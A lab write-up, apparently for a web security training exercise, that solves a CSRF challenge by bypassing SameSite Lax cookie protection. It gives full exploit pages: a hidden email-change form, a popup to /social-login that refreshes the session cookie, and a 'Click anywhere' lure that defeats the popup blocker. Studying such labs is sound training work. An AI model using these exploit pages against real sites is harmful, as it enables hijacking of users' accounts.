Skip to content

LAB 10 - SameSite Lax bypass via cookie refresh

Initial instructions

This lab's change email function is vulnerable to CSRF. To solve the lab, perform a CSRF attack that changes the victim's email address. You should use the provided exploit server to host your attack.

The lab supports OAuth-based login. You can log in via your social media account with the following credentials: wiener:peter

First of all lets login with wiener credentials and lets try update its email and intercept this request with Burpsuite.

alt text

Now I will generate a CSRF PoC from this intercepted request and send it to the victim.

alt text

After a while we can see there's no response so we need to bypass the SameSite restrictions.

If we go to /social-login this automatically initiates the full OAuth flow. This sets a new cookie even if we were already logged in. So lets go to the exploit server and from our original CSRF PoC we will add this.

<script>
    window.open('https://YOUR-LAB-ID.web-security-academy.net/social-login');
    setTimeout(changeEmail, 5000);

    function changeEmail(){
        document.forms[0].submit();
    }
</script>

So the request will be now all that.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a7d00ff0418a23d80814e32005d0044.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="test@hacked.net" />
      <input type="submit" value="Submit request" />
    </form>
<script>
    window.open('https://0a7d00ff0418a23d80814e32005d0044.web-security-academy.net/social-login');
    setTimeout(changeEmail, 5000);

    function changeEmail(){
        document.forms[0].submit();
    }
</script>
  </body>
</html>

If we view the exploit we will realize that the initial request gets blocked by the browser's popup blocker.

alt text

So lets bypass it too. For bypassing this restriction it's really simple because the popup has been blocked because we haven't manually interacted with the website, so lets tweak the exploit that induces the victim to click on the page.

This is how I do it.

<p>Click anywhere on the page</p>

This would be the full request now.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a7d00ff0418a23d80814e32005d0044.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacked@astro.xyz" />
      <input type="submit" value="Submit request" />
    </form>
<p>Click anywhere on the page</p>
<script>
    window.open('https://0a7d00ff0418a23d80814e32005d0044.web-security-academy.net/social-login');
    setTimeout(changeEmail, 5000);

    function changeEmail(){
        document.forms[0].submit();
    }
</script>
  </body>
</html>

Lets send it to the victim now.

alt text

Congratulations, you solved the lab!